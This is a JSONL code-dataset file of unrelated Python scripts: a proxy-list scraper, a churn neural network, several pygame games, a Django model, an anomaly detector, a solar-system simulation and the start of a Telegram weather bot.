+{"seq_id":"478763100","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport re\nimport logging\n\nimport os\nimport sys\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nfrom agent import Agent\nfrom util.webRequest import WebRequest\n\nlogger = logging.getLogger(__name__)\n\n\n@Agent.register\nclass FreeProxy(Agent):\n def __init__(self):\n self.url = 'https://free-proxy-list.net/'\n self.re_ip_port_pattern = re.compile(\n r\"(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})(\\d{1,5})\", re.I)\n\n def extract_proxy(self, page_num=0):\n try:\n rp = WebRequest().get(self.url.format(page=page_num), timeout=10)\n re_ip_port_result = self.re_ip_port_pattern.findall(rp.text)\n for host, port in re_ip_port_result:\n yield f'{host}:{port}'\n\n except:\n pass\n\n\nif __name__ == '__main__':\n p = Agent.proxies[0]()\n for proxy in p.extract_proxy():\n print(proxy)\n","sub_path":"agent/free_proxy.py","file_name":"free_proxy.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"393891435","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 14 21:24:48 2020\n\n@author: encry973r\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n# import dataset\ndata = pd.read_csv('Churn_Modelling.csv')\n\n# matrix of features and dependent variable\nX = data.iloc[:, 3:13].values\ny = data.iloc[:, 13].values\n\n# convert country column to dummies\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\n# ct for the country dimension\nct = ColumnTransformer(transformers=[('one_hot_encoder', \n OneHotEncoder(categories='auto'),\n [1])],\n remainder='passthrough')\nX = ct.fit_transform(X)\n# drop first dummie column\nX = X[:, 1:]\n\n# ct for the gender dimension\nct = ColumnTransformer(transformers=[('one_hot_encoder',\n OneHotEncoder(categories='auto'),\n [3])],\n remainder='passthrough')\nX = ct.fit_transform(X)\n# drop first dummie column\nX = X[:, 1:]\n\n# split dataset into train and test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.2, random_state=0)\n\n# feature scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n# copies for reference\nX_train2 = X_train.copy()\nX_test2 = X_test.copy()\n\n# dimensional reduction : PCA , n_components = 6 ; gave 62.81%\nfrom sklearn.decomposition import PCA\npca = PCA(n_components=6)\nX_train = pca.fit_transform(X_train)\nX_test = pca.transform(X_test)\nexplained_variance_ratio = pca.explained_variance_ratio_\n\n# build ANN\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nclassifier = Sequential()\n# add input and first hidden layer\nclassifier.add(Dense(units=12, kernel_initializer='uniform', activation='relu', input_dim=6))\n# add second hidden layer\nclassifier.add(Dense(units=12, kernel_initializer='uniform', activation='relu'))\n# add out put layer\nclassifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n# fit ANN to train dataset\nclassifier.fit(X_train, y_train, batch_size=10, 
epochs=100)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Build ANN architecture\n# import keras\n# from keras.models import Sequential\n# from keras.layers import Dense\n\n# initialize the classifier\n# classifier = Sequential()\n\n# accuracy\n# units = 6, accuracy = 83.41%\n# units = 11, accuracy = 86.68%\n\n# add input and first hidden\n# classifier.add(Dense(units=11, kernel_initializer='uniform', activation='relu', input_dim=11))\n# # add second hidden layer\n# classifier.add(Dense(units=11, kernel_initializer='uniform', activation='relu'))\n# # output layer\n# classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n# # compile network\n# classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# # fit data to classifier\n# classifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\n# # predict for X_test\n# y_pred = classifier.predict(X_test)\n# y_pred = (y_pred > 0.5)\n\n# decision tree classifier\n# 80.25% accuracy\n# from sklearn.tree import DecisionTreeClassifier\n# classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# Random Forest Classifier\n# 86.85% accuracy\n# from sklearn.ensemble import RandomForestClassifier\n# classifier = RandomForestClassifier(n_estimators=300, criterion='entropy', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# kernel svm\n# 86.85% accuracy\n# from sklearn.svm import SVC\n# classifier = SVC(kernel='rbf', random_state=0)\n# classifier.fit(X_train, y_train)\n\n# poly svm\n# 85.7% accuracy\n# from sklearn.svm import SVC\n# classifier = SVC(kernel='poly', degree=3, random_state=0)\n# classifier.fit(X_train, y_train)\n\n# kmeans\n# 82.95% accuracy\n# from sklearn.naive_bayes import GaussianNB\n# classifier = GaussianNB()\n# classifier.fit(X_train, y_train)\n\n# KNN\n# 82.7% accuracy\n# from sklearn.neighbors import KNeighborsClassifier\n# classifier = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)\n# classifier.fit(X_train, y_train)\n\n\n# # predict for X_test\n# y_pred = classifier.predict(X_test)\n\n\n# show confusion matrix\nfrom sklearn.metrics import confusion_matrix \ncm = confusion_matrix(y_test, y_pred) \n\n# truth = ((cm[0, 0] + cm[1, 1])/cm.sum())*100\n\n# print(str(truth) + '%')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"7DeepLearning/ANN/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"64924197","text":"### Joseph Rice 10/2/2017\r\n##\r\n##### Plan for this code down below\r\n##\"\"\" 1. Set the background up for the target\r\n## 2. Get the circles asighned to spasific points trough mouse clicks\r\n## 3. 
Get the sum of the scores computed on the graphic window\r\n##\r\n## \"\"\" \r\n##\r\n##\r\n##\r\n##\r\n\r\n\r\nmaxX=minY = 10\r\nmaxY=minX = -10\r\n\r\nfrom graphics import *\r\n\"\"\" THIS SETS THE GRAPH WIN UP \"\"\" \r\nfrom math import pi as PIE\r\nfrom math import sqrt\r\nwin = GraphWin(\"Archer Target\", 600,600)\r\nwin.setCoords(minX,minY,maxX,maxY)\r\nwin.setBackground(\"green\")\r\n\r\n## CODE FOR CIRCLES \r\ncenter = Point(0,0)\r\nc_white = Circle(center,5)\r\nc_white.setFill(\"white\")\r\nc_white.draw(win)\r\n\r\nc_black = Circle(center,4)\r\nc_black.setFill(\"purple\")\r\nc_black.draw(win)\r\n\r\ncblue = Circle(center,3)\r\ncblue.setFill(\"Blue\")\r\ncblue.draw(win)\r\n\r\nc_red = Circle(center,2)\r\nc_red.setFill(\"red\")\r\nc_red.draw(win)\r\n \r\nc_yellow = Circle(center, 1)\r\nc_yellow.setFill(\"yellow\")\r\nc_yellow.draw(win)\r\n\r\nTotal_score = Text(Point(0,-9),\"NO RULES!!!!!!!!!!\")\r\n\r\nTotal_score.draw(win)\r\nmessage = Text(Point(0,6), \"Click To Shoot Arrow\")\r\nmessage.setStyle(\"bold\")\r\nmessage.draw(win)\r\n\r\n## list for storage \r\ntotal_score = []\r\n\r\n## TEST CODE \r\nTry_1 = win.getMouse()\r\nend_of_arrow = Point(-2,4)\r\n## function for the calculation of radius\r\ndef radius(x,y):\r\n r = sqrt(x**2 + y**2)\r\n return r \r\n## TEST FUNCTION CODE\r\n##value = radius(3,4) \r\n##print(value)\r\n\r\n### function for the logic gate.\r\ndef score(r):\r\n if r <=1:\r\n value = 9\r\n elif r <=2:\r\n value = 7 \r\n elif r <=3:\r\n \r\n value = 5\r\n elif r <=4:\r\n \r\n value = 3\r\n elif r <=5:\r\n \r\n value = 2\r\n else:\r\n \r\n value = 0\r\n return value\r\n\r\nr = radius(Try_1.getX(),Try_1.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New = str(value) + \" Points!\"\r\nTotal_score.setText(message_New)\r\n\r\n## \r\nline = Circle(Point(Try_1.getX(),Try_1.getY()),0.1)\r\nline.setFill(\"black\")\r\nline.draw(win)\r\n\r\nTry_2 = win.getMouse()\r\nr = radius(Try_2.getX(),Try_2.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New2 = str(value) + \" Points !\"\r\nTotal_score.setText(message_New2)\r\n\r\ncir = Circle(Point(Try_2.getX(),Try_2.getY()),0.1)\r\ncir.setFill(\"black\")\r\ncir.draw(win)\r\n\r\nTry_3 = win.getMouse()\r\nr = radius(Try_3.getX(),Try_3.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New3 = str(value) + ' Points !'\r\nTotal_score.setText(message_New3)\r\n\r\ncir_3 = Circle(Point(Try_3.getX(),Try_3.getY()),0.1)\r\ncir_3.setFill(\"black\")\r\ncir_3.draw(win)\r\n\r\nTry_4 = win.getMouse()\r\nr = radius(Try_4.getX(),Try_4.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New4 = str(value) + ' Points !'\r\nTotal_score.setText(message_New4)\r\n\r\ncir_4 = Circle(Point(Try_4.getX(),Try_4.getY()),0.1)\r\ncir_4.setFill(\"black\")\r\ncir_4.draw(win)\r\n\r\nTry_5 = win.getMouse()\r\nr = radius(Try_5.getX(),Try_5.getY())\r\nvalue = score(r)\r\ntotal_score.append(value)\r\nmessage_New5 = str(value) + \" Points !\"\r\nTotal_score.setText(message_New5)\r\n\r\ncir_5 = Circle(Point(Try_5.getX(),Try_5.getY()),0.1)\r\ncir_5.setFill(\"black\")\r\ncir_5.draw(win)\r\n\r\nmessage.setText(\"click to see total\")\r\nwin.getMouse()\r\naddition = 0\r\n\r\n\r\nfor i in total_score:\r\n number_value = int(i)\r\n addition = number_value + addition\r\n\r\nmessage.setText(\"Your final score 
is:{0:7}\".format(addition))\r\n\r\nwin.getMouse()\r\n\r\nwin.close()\r\n\r\n","sub_path":"Archer_Target.py","file_name":"Archer_Target.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"382668868","text":"def seperate(numbers, threshold):\n thresholdAndOver = []\n thresholdUnder = []\n for i in range(len(numbers)):\n if numbers[i] >= threshold: thresholdAndOver.append(numbers[i])\n else: thresholdUnder.append(numbers[i])\n return thresholdAndOver,thresholdUnder\n\n\na = [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nover,under = seperate(a,5)\n\nprint(over,under)\n\n\ndef multiplication_table(n):\n a=[]\n for i in range(1,n+1):\n for j in range(1,n+1):\n mul = i * j\n a.append(mul)\n print(a)\n for k in range(1,n+1):\n a.pop()\n return a\n\nprint(multiplication_table(4))","sub_path":"øvinger 7/gangetabell og lister.py","file_name":"gangetabell og lister.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"282426430","text":"from django.db import models\nfrom django.conf import settings\nfrom event.models import Event\n\n\n# Create your models here.\n\n\nclass Order(models.Model):\n\tuser = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n\tevent = models.ForeignKey(Event, on_delete=models.CASCADE)\n\tprice = models.BigIntegerField('event price', default=0)\n\tdate = models.DateTimeField(auto_now=True)\n\n\tdef __str__(self):\n\t\treturn f'{self.user.username} buy {self.event.title_event}'","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"311574549","text":"import numpy as np\n\n\nclass SixSigma ():\n\n '''Implementation of SixSigma method for anomaly detection.\n Six Sigma uses three standard deviations below the mean and three standard deviations\n above the mean to predict anomalies.\n\n Attributes:\n time_window : type int (default = 2)\n 'window size -> number of samples used for calculating the mean and standard deviation'\n\n Example shown in test_six_sigma.py\n '''\n\n\n def __init__(self,time_window=2):\n\n self.time_window = time_window\n self.buffer = []\n\n\n def fit (self,X,y):\n\n '''fit the model. Adjust buffer to obtain only the last time_window number of samples'''\n\n self.buffer.append(X)\n self.buffer = self.buffer[-self.time_window:]\n\n def predict (self,X):\n\n '''predict class for passed data. 
'''\n\n if len(self.buffer) < self.time_window:\n return None\n else:\n prediction = 0\n j = 0\n while j < len(X):\n i = 0\n feature_array = []\n while i < len(self.buffer):\n feature_array.append(self.buffer[i][j])\n i += 1\n average = np.mean(feature_array)\n sigma = np.std(feature_array)\n prediction = int(abs(X[j]) > abs(average) + 3 * abs(sigma))\n if prediction == 1:\n break\n j += 1\n return prediction\n\n","sub_path":"src/skmultiflow/anomaly_detection/six_sigma.py","file_name":"six_sigma.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"41267989","text":"import logging\nimport dtlpy as dl\nfrom importlib import import_module\nfrom plugin_utils import maybe_download_data\nlogger = logging.getLogger(__name__)\n\n\nclass PluginRunner(dl.BasePluginRunner):\n \"\"\"\n Plugin runner class\n\n \"\"\"\n\n def __init__(self, plugin_name):\n self.plugin_name = plugin_name\n pass\n\n def run(self, dataset, model_specs, hp_values, configs=None, progress=None):\n\n maybe_download_data(dataset)\n\n # get project\n # project = dataset.project\n # assert isinstance(project, dl.entities.Project)\n\n # start tune\n cls = getattr(import_module('.adapter', 'zoo.' + model_specs['name']), 'AdapterModel')\n\n final = 1 if self.plugin_name == 'trainer' else 0\n devices = {'gpu_index': 0}\n\n adapter = cls(devices, model_specs, hp_values, final)\n if hasattr(adapter, 'reformat'):\n adapter.reformat()\n if hasattr(adapter, 'data_loader'):\n adapter.data_loader()\n if hasattr(adapter, 'preprocess'):\n adapter.preprocess()\n if hasattr(adapter, 'build'):\n adapter.build()\n adapter.train()\n\n if final:\n return adapter.get_checkpoint()\n else:\n metrics = adapter.get_metrics()\n if type(metrics) is not dict:\n raise Exception('adapter, get_metrics method must return dict object')\n if type(metrics['val_accuracy']) is not float:\n raise Exception(\n 'adapter, get_metrics method must return dict with only python floats. 
'\n 'Not numpy floats or any other objects like that')\n return metrics\n\n # pipeline_id = str(uuid.uuid1())\n # local_path = os.path.join(os.getcwd(), pipeline_id)\n #\n # #####################\n # # upload for resume #\n # #####################\n # project.artifacts.upload(plugin_name='tuner',\n # session_id=pipeline_id,\n # local_path=local_path)\n #\n # #######################\n # # download for resume #\n # #######################\n # project.artifacts.download(plugin_name='tuner',\n # session_id=pipeline_id,\n # local_path=local_path)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"304848463","text":"from Planet import *\nfrom Spaceship import *\nfrom Frame import *\nfrom Maths import *\nimport time\n\nframe = Frame()\n\nobjects = []\n\nsoleil = Planet(None, \"Soleil\", 1.99e30, 1.39e6, 0, 0)\nsoleil.x = frame.frame.winfo_screenwidth()/2\nsoleil.y = frame.frame.winfo_screenheight()/2\n\nmercure = Planet(soleil, \"Mercure\", 3.29e23, 4.88e3, 5.79e7, 308)\nvenus = Planet(soleil, \"Venus\", 4.87e24, 1.21e4, 1.08e8, 168)\nterre = Planet(soleil, \"Terre\", 5.97e24, 1.27e4, 1.49e8, 175)\nlune = Planet(terre, \"Lune\", 7.35e22, 3.47e3, 3.84e5, 113.8)\nmars = Planet(soleil, \"Mars\", 6.42e23, 6.78e3, 2.27e8, 313)\njupiter = Planet(soleil, \"Jupiter\", 1.90e27, 1.40e5, 7.79e8, 309) \nsaturne = Planet(soleil, \"Saturne\", 5.68e26, 1.16e5, 1.42e9, 168)\nuranus = Planet(soleil, \"Uranus\", 8.68e25, 5.07e4, 2.88e9, 353)\nneptune = Planet(soleil, \"Neptune\", 1.02e26, 4.92e4, 4.50e9, 324)\n\nvaisseau = Spaceship(300, 300)\n\nobjects.append(soleil)\nobjects.append(mercure)\nobjects.append(venus)\nobjects.append(terre)\nobjects.append(lune)\nobjects.append(mars)\nobjects.append(jupiter)\nobjects.append(saturne)\nobjects.append(uranus)\nobjects.append(neptune)\nobjects.append(vaisseau)\n\n##Boucle principale\nFPS=60\nsleepTime = 1/FPS\nelapsed = 0 #Temps écoulé\nstartloop = time.time() \n\ndef upPos():\n if vaisseau.x < vaisseau.photo.width()/2:\n setSpeedScrollX(-vaisseau.speedX)\n elif vaisseau.x > frame.frameW - vaisseau.photo.width():\n setSpeedScrollX(-vaisseau.speedX)\n else:\n setSpeedScrollX(0)\n\n if vaisseau.y < vaisseau.photo.height()/2:\n setSpeedScrollY(-vaisseau.speedY)\n elif vaisseau.y > frame.frameH + vaisseau.photo.height():\n setSpeedScrollY(-vaisseau.speedY)\n else:\n setSpeedScrollY(0)\n \nwhile True:\n #Le temps qu'il s'est écoulé depuis le dernier tour de boucle\n delta = time.time()-startloop\n startloop = time.time()\n \n increaseTime=frame.time.get()*2.628e6 #Convertie les mois en secondes\n frame.univers.delete('all')\n \n #Parcours tous les objets, les actualise et les affiche\n for i in range(len(objects)):\n obj = objects[i]\n obj.move(delta*increaseTime)\n frame.draw(obj)\n frame.setInfos(round(vaisseau.x), round(vaisseau.y), elapsed)\n \n TRC = PFD(vaisseau, objects, soleil)\n #On convertie le TRC qui est en mètre en km\n vaisseau.accelX = convertDist(TRC[0]*10**-3)\n vaisseau.accelY = convertDist(TRC[1]*10**-3)\n \n upPos()\n \n #Si l'utilisateur a cliqué affiche les infos de la planète\n if getClicked():\n infoPlanet = getInfoPlanet(getPlanetClicked(objects, getMousePos()))\n #S'il n'a pas cliqué en dehors d'une planète \n if infoPlanet != None:\n frame.createPopup(infoPlanet)\n setClicked(False)\n \n frame.frame.update()\n time.sleep(sleepTime)\n elapsed += 
delta*increaseTime\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"355930040","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.dont_write_bytecode = True\ndef cmp_dict(src_data,dst_data):\n # 比较两个字典是否完全一致,若一致返回True\n flag = True\n if not (type(src_data) == type(dst_data)):\n flag = False\n else:\n if isinstance(src_data,dict):\n if not (len(src_data) == len(dst_data)):\n flag = False\n else:\n for key in src_data:\n if not dst_data.has_key(key):\n flag = False\n break\n else:\n flag = (flag and cmp_dict(src_data[key],dst_data[key]))\n\n elif isinstance(src_data,list):\n if not (len(src_data) == len(dst_data)):\n flag = False\n else:\n for src_list, dst_list in zip(sorted(src_data), sorted(dst_data)):\n flag = (flag and cmp_dict(src_list, dst_list))\n if not flag:\n break\n else:\n if not (src_data == dst_data):\n flag = False\n return flag\n\ndef get_diff_keys(cover_keys,cmp_dict,current_dict):\n # 不同模型参数比较,参数相同的键放入same_keys中,不同的放入diff_keys,便于csv文件中参数顺序的排列\n cmp_keys = cmp_dict.keys()\n current_keys = current_dict.keys()\n diff_keys = []\n same_keys = []\n for key in cover_keys:\n if (key in cmp_keys) and (key in current_keys):\n if cmp_dict[key] == current_dict[key]:\n same_keys.append(key)\n else:\n diff_keys.append(key)\n else:\n diff_keys.append(key)\n return diff_keys,same_keys","sub_path":"remodet_repository_wdh_part/Projects/PyLib/Utils/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"196153343","text":"# Name : Gobang game \n# Author : simon \n# e-mail : 2441873702@qq.com\n# Date : 2020.05.27 19:02\n# version: v3\n# http://www.pyinstaller.org/downloads.html\n# http://www.ico51.cn/ \n# bug 1 : 当鼠标点击到画布棋盘外仍可显示棋子 ———— fixed\n# bug 2 : 棋子会覆盖之前已经绘制的位置 ———— fixed\n# bug 3 : 棋子数量达到一定时,不会判定结果\n\n\nimport pygame\nimport pygame.freetype\n\n\n# fps setting\nfps = 300\n\n# default str value\nsize = width, height = 800, 600\nborder = 50 \nwlc_str = \"Welcom to gobang game!\"\nsuccessor = \"\"\n\n# default color\nbg_color = (128,138,135)\t#pygame.Color(\"white\")\nline_color = 0,0,0\n\n# chess color\nWHITE = 255,255,255\nBLACK = 0,0,0\nfont_color = 0,0,0\n\npygame.init()\nfclock = pygame.time.Clock()\n# pygame Surface\nscreen = pygame.display.set_mode(size, pygame.RESIZABLE)\nbackground = pygame.Surface(screen.get_size())\ncaption = \"Gobang Game\"\npygame.display.set_caption(caption)\nicon = pygame.image.load('gobang_logo.png')\npygame.display.set_icon(icon)\n\n\ndef draw_font(background, string='Hello pygame!',font_size=20, positon=(0,0)):\n\t# font_type = pygame.freetype.Font('C://Windows//Fonts//msyh.ttc', 1)\n\tfont_type = pygame.freetype.Font('./consola.ttf', 1)\t\n\tfont_rect = font_type.render_to(background, positon, string, fgcolor=font_color, size=font_size)\n\tscreen.blit(background, (0, 0))\n\ndef draw_chessboard_rect(background, rect_point, border):\n\tx_num = int((width - 1.5 * border) / border)\n\ty_num = int((height - 1.5 * border) / border)\n\tfor num_w in range(x_num):\n\t\tfor num_h in range(y_num):\n\t\t\trect_point.append([num_w*border + 50, num_h*border + 50])\n\tfor item in rect_point:\n\t\ts_rect = item[0], item[1], border, border\n\t\tpygame.draw.rect(background, line_color, s_rect, 1)\n\treturn rect_point\n\ndef success(positon):\n\tfor item in positon:\n\t\t# 行\n\t\tif [item[0]+1,item[1]] in 
positon:\n\t\t\tif [item[0]+2,item[1]] in positon:\n\t\t\t\tif [item[0]+3,item[1]] in positon:\n\t\t\t\t\tif ([item[0]+4,item[1]] in positon):\n\t\t\t\t\t\t# print(\"success!\")\n\t\t\t\t\t\treturn True\n\t\t# 列\n\t\telif [item[0],item[1]+1] in positon:\n\t\t\tif [item[0],item[1]+2] in positon:\n\t\t\t\tif [item[0],item[1]+3] in positon:\n\t\t\t\t\tif [item[0],item[1]+4] in positon:\n\t\t\t\t\t\treturn True\n\t\t# 对角\n\t\telif [item[0]+1,item[1]+1] in positon:\n\t\t\tif [item[0]+2,item[1]+2] in positon:\n\t\t\t\tif [item[0]+3,item[1]+3] in positon:\n\t\t\t\t\tif [item[0]+4,item[1]+4] in positon:\n\t\t\t\t\t\t# print(\"success!\")\n\t\t\t\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\ndef success_judge(chess_dict):\n\tblack_pos = []\n\twhite_pos = []\n\tglobal successor\n\t# print(chess_dict)\n\t# {'10,4': 2, '10,5': 1, '6,4': 2, '6,5': 1, '8,7': 2, '5,7': 1, '6,9': 2, '9,4': 1, '9,6': 2, '10,8': 1}\n\tfor item in chess_dict:\n\t\tx = item.split(\",\", 1)\n\t\tif chess_dict[item] == 1:\n\t\t\twhite_pos.append([int(x[0]),int(x[1])])\n\t\telse:\n\t\t\tblack_pos.append([int(x[0]),int(x[1])])\n\t\n\tprint(\"white_pos = \", white_pos)\n\tprint(\"black_pos = \", black_pos)\n\n\tif success(white_pos):\n\t\tsuccessor = \"white\"\n\t\treturn True\n\telif success(black_pos):\n\t\tsuccessor = \"black\"\n\t\treturn True\n\telse:\n\t\treturn False\n\"\"\"\n\t\tif success(white_pos):\n\t\t\tsuccessor = \"white\"\n\t\t\treturn True\n\t\t\tcontinue\n\t\telif success(black_pos):\n\t\t\tsuccessor = \"black\"\n\t\t\treturn True\n\t\t\tcontinue\n\"\"\"\n\ndef game_over(background, delay_time):\n\timport time,sys\n\tdraw_font(background, string=\"game over!\")\n\ttime.sleep(delay_time)\n\tsys.exit()\n\n\n# put chess down \ndef chess_down(background, position, color):\n\tpygame.draw.circle(background, color, position, 20, 0)\n\n\n\nmouse_pos = []\nblack_position = []\nwhite_position = []\nkey_flag = 0\nendflag = False\nwhile True:\n\t# event manage\n\tfor event in pygame.event.get():\n\t\t# quit\n\n\t\tif event.type == pygame.QUIT:\n\t\t\tgame_over(background, 0.3)\n\t\t\t\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\tgame_over(background, 0.1)\n\n\t\t# elif event.type == pygame.KEYDOWN:\n\t\t# \tif event.key == 'K_RETURN':\n\t\t# \t\tendflag = 0\n\t\t# window resize\n\t\telif event.type == pygame.VIDEORESIZE:\n\t\t\tsize = width, height = event.size[0], event.size[1]\n\t\t\tscreen = pygame.display.set_mode(size, pygame.RESIZABLE)\n\t\t\tbackground = pygame.Surface(screen.get_size())\n\t\telif endflag:\n\t\t\tcontinue\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_pos.append([event.pos[0],event.pos[1]])\t# .pos --> tuple = (x_pos,y_pos)\n\n\trect_point = []\n\tbackground.fill(bg_color)\n\tdraw_chessboard_rect(background, rect_point, border)\n\tdraw_font(background, string=wlc_str)\n\n\tchess_dict = {}\n\tcount = 0\n\tfor position in mouse_pos:\n\t\t# position calculate:\n\t\tposition[0] = round(position[0] / 50) * 50\n\t\tposition[1] = round(position[1] / 50) * 50\n\n\t\tif (width//50 > round(position[0]/50) > 0) and (height//50 > round(position[1]//50) > 0):\n\t\t\tkey = str(position[0]//50)+\",\"+str(position[1]//50)\n\t\t\t# print(key)\n\t\t\t# flags \n\t\t\t# 0 -- no\n\t\t\t# 1 -- white\n\t\t\t# 2 -- black\n\n\t\t\tif key not in chess_dict:\n\t\t\t\tkey_flag = 1\n\t\t\t\t# flags = 0\n\t\t\t\tif count % 2 == 0:\n\t\t\t\t\tchess_color = BLACK\n\t\t\t\t\tflags = 2\n\t\t\t\telse:\n\t\t\t\t\tchess_color = WHITE\n\t\t\t\t\tflags = 1\n\t\t\t\tcount = 
count + 1\n\t\t\t\t# 归一化\n\t\t\t\tnew_dict = {key : flags}\n\t\t\t\tchess_dict.update(new_dict)\n\t\t\t\tchess_down(background, position, chess_color)\n\t\t\telse:\n\t\t\t\tkey_flag = 0\n\tprint(chess_dict)\n\tendflag = success_judge(chess_dict)\t# judgement advancement to fix bug 3\n\tif endflag:\n\t\tdraw_font(background, string=\"Congradulations! \"+successor+\" wins!\",font_size=20, positon=(300,20))\n\t\t# endflag = success_judge(chess_dict)\t\t# error bug 3\n\t# endflag = success_judge(chess_dict)\t\t\t# error bug 3\n\n\n\n\tscreen.blit(background, (0,0))\n\tfclock.tick(fps)\n\tpygame.display.update()\n\n","sub_path":"gobang/Gobang_v1.3.py","file_name":"Gobang_v1.3.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"248242750","text":"#using for test case when need . complete empty py.\n'''\nurl = \"http://zombie-bites.com/j/df\"\nprint(url.split(\"//\")[-1].split('www.')[-1].split('.')[0] )\n'''\ns='Hello world. ooo'\nprint(s.count('o'))\n\nprint(ord('a'), ord('b'))\nprint(ord('A'), ord('B'))\nlist =[1,2,3,4,8,6]\nlist.sort()\nprint(list)\ns1 ='one two three'\nlist = s1.split()\nprint(list)\nmax= 0\nfor c in list:\n if len(c)>max:\n max = len(c)\nfor c in range(len(list)-1,-1,-1):\n if len(list[c]) ==max:\n print(list[c])\n break\nprint(ord('a')-96)\n\nprint(ord('a'),ord('A'))","sub_path":"python/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"393983667","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\r\nimport os\r\nimport requests\r\nfrom pymongo import MongoClient\r\n\r\nDARKSKY_TOKEN = os.environ.get(\"DARKSKY_API_KEY\")\r\nTELEGRAM_TOKEN = os.environ.get(\"BOT_KEY\")\r\nDB_NAME = os.environ.get(\"MONGO_DB\")\r\nPORT = os.environ.get(\"PORT\")\r\nrepo = MongoClient(os.environ.get(\"MONGODB_URI\"))\r\n\r\nos.system('python -m http.server {} &'.format(PORT))\r\n\r\nstartText = \"Olá eu sou o AtmoBot, existo para providenciar dados e informações sobre o local que você providenciar. 
Para usar apenas mande uma menssagem de localização com o local de procura.\"\r\n\r\nmessageFormat_br = \"\"\"> Informações Atuais:\r\n{sum}\r\nVento: {wind} m/s {wind_speed_warn_now}\r\nTemperatura: {temp} ºC \r\nHumidade: {umid} g/m³\r\nVisibilidade: {visi} km\r\nChuva: {rain} % de chance\r\n\r\n> Informações Dia:\r\n{sum_day}\r\nVento: {wind_day} m/s {wind_speed_warn_day}\r\nTemperatura Maxima: {temp_day} ºC \r\nHumidade: {umid_day} g/m³\r\nVisibilidade: {visi_day} km\r\nChuva: {rain_day} % de chance\r\n\r\nRestrições Aéreas:\r\n\t- \"\"\"\r\n\r\nmessageFormat_en = \"\"\"> Current Data:\r\n{sum}\r\nWind: {wind} m/s {wind_speed_warn_now}\r\nTemperature: {temp} ºC \r\nHumidity: {umid} g/m³\r\nVisibility: {visi} km\r\nRain: {rain} %\r\n\r\n> Day Data:\r\n{sum_day}\r\nWind: {wind_day} m/s {wind_speed_warn_day}\r\nMax Temperature: {temp_day} ºC \r\nHumidity: {umid_day} g/m³\r\nVisibility: {visi_day} km\r\nRain: {rain_day} %\r\n\r\nAerial Restriction:\r\n\t- \"\"\"\r\n\r\nmessageFormat_us = \"\"\"> Current Data:\r\n{sum}\r\nWind: {wind} mph {wind_speed_warn_now}\r\nTemperature: {temp} ºF 